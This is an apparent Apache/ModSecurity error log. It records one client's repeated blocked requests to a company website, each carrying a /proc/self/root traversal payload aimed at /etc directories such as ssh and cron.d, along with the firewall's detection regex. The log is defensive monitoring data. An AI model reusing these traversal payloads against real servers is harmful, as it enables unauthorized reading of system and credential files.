[Fri Mar 20 09:35:47.794951 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.243.128:55758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_I_XLqtnMIWvjpaKtmAAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:55.517274 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.243.128:55766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_KzJ3M9BSuKP7CAYzsgAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:57.860068 2026] [:error] [pid 9818:tid 140411725141760] [client 74.7.243.128:47094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_LV1pVZ5mVmJwsFNEhQAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:35:59.238991 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:47100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_LxCii7xarUs8iHZ7lwAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:36:06.066921 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.243.128:54216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_NhCii7xarUs8iHZ7pAAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:36:17.302849 2026] [:error] [pid 9818:tid 140411733534464] [client 74.7.243.128:54220] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_QV1pVZ5mVmJwsFNEjwAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 09:36:24.041655 2026] [:error] [pid 11642:tid 140411599251200] [client 74.7.243.128:52716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_SLninkcc-iUj5ApxYwAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:36:25.365495 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:57506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_SeoXxyEfFpUF8f-UgwAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:36:34.357606 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.243.128:57516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_UjJ3M9BSuKP7CAY0AwAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:36:42.999851 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:58136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_WvXLqtnMIWvjpaKttgAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:36:44.439890 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.243.128:39386] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_XPXLqtnMIWvjpaKttwAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:36:45.840151 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:39392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_XfqxLDW4GITHUkT9XQAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:36:47.203157 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.243.128:39406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_X_qxLDW4GITHUkT9XwAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:36:48.547122 2026] [:error] [pid 9818:tid 140411716749056] [client 74.7.243.128:39420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_YF1pVZ5mVmJwsFNEmAAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:36:49.843225 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.243.128:34288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_YfqxLDW4GITHUkT9YAAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:36:51.160444 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.243.128:34290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_YxCii7xarUs8iHZ7vwAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:36:52.498365 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:34300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_ZOoXxyEfFpUF8f-UigAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:36:53.861143 2026] [:error] [pid 11642:tid 140411733534464] [client 74.7.243.128:34316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_Zbninkcc-iUj5ApxcgAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:36:55.175458 2026] [:error] [pid 11642:tid 140411708356352] [client 74.7.243.128:34328] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_Z7ninkcc-iUj5ApxdgAAA4Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:36:56.514257 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.243.128:34344] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_aDJ3M9BSuKP7CAY0DwAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:36:57.776962 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:34356] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_ada6ubjKNq_cu4btpgAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
